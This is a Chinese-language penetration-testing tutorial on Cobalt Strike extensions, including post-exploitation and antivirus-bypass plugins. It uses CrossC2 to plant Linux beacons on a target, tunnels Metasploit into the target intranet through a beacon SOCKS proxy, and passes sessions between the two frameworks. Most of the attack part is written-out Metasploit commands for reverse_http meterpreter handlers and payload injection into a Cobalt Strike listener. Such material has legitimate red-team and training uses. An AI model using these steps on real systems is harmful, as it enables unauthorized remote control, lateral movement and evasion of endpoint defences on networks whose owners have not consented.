CobaltStrike渗透框架进阶之扩展脚本和MSF联动

CobaltStrike扩展脚本

扩展是Cobaltstrike一个极为重要的模块，它有效地丰盈了cobaltstrike的功能

选择菜单栏的CobaltStrike–>脚本管理器，点击load，然后选择cna扩展文件即可，旁边的unload为去除该扩展，，reload为重新加载该扩展

常用扩展插件

后渗透插件:梼杌

免杀插件:bypassAV

上线linux主机:CrossC2

CS上线linux主机

Cross C2项目是一个可以生成 Linux/Mac OS 的 CS payload 的跨平台项目

CrossC2安装

下载CrossC2.cna

https://github.com/gloxec/CrossC2/releases/tag/v3.0.2 修改CrossC2-GithubBot-2021-11-02.cna脚本中genCC2路径为真实路径

选择Script Manager，添加CrossC2-GithubBot-2021-11-02.cna (如果成功安装，菜单栏会多出一项CrossC2)

需要在linux/mac上启动客户端

操作过程中要注意如下几点：

1.需要改cna路径

2.要使用 windows/beacon_https/reverse_https 监听器。

3.要把团队服务器下的隐藏文件 .cobaltstrike.beacon_keys 复制到本地 CS 目录下。

4.文件都丢到CS 客户端根目录下，别搞二级目录。

5.生成的 payload 是一个 Linux 下的执行命令payload和可执行文件(/tmp目录下)，ip 和端口对应那个windows/beacon_https/reverse_https 监听器。

CrossC2插件生成linux可执行程序 上传后门到靶机，赋予权限并执行上线beacon

CS联动MSF

cobalt strike（简称CS）及Metasploit（简称msf）各有所长，cs更适合作为稳控平台，msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短，我们进行联动。

通过CS内置socks代理将本地MSF带入目标内网执行操作 shell ipconfig发现目标机器存在5网段

思路：利用 beacon shell 在目标机器和团队服务器之间建立 socks ， 而后再在本地利用

通过proxychains 之类的工具连到目标内网即可。

通过CS内置socks代理将本地MSF带入目标内网执行操作

 查看团队服务器 socks 端口启起来了没有：netstat -tunlp | grep 5454

本地 kali 编辑 /etc/proxychains.conf 文件，挂上团队服务器 ip 和 socks 端口，就可以直接连到目标内网（类型为socks4）可以用 proxychains 之类的工具依次代理，如果想更方便一点，直接把整个 msf 挂到目标内网去让本地 msf 所有模块的流量都从 cs 的 socks 代理走

CS beacon反弹给公网MSF

1.cs上创建一个http的外部监听器

2.msf开启监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost （内部ip）

set lport 8023

exploit -j

3.回到 cs 上，在会话处右键，选择 spawn 4.Msf得到meterpreter

MSF meterpreter反弹给CS

1.在cs开启一个监听

2.Msf上执行payload注入模块

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true #默认情况下，payload_inject执行之后会在本地产生一个新的handler监听，由于我们已经有了一个，所以不需要在产生一个，所以这里我们设置为true

set lhost x.x.x.x #cobaltstrike监听的ip

set lport 8003 #cobaltstrike监听的端口

set session 1 #这里是获得的session的id

exploit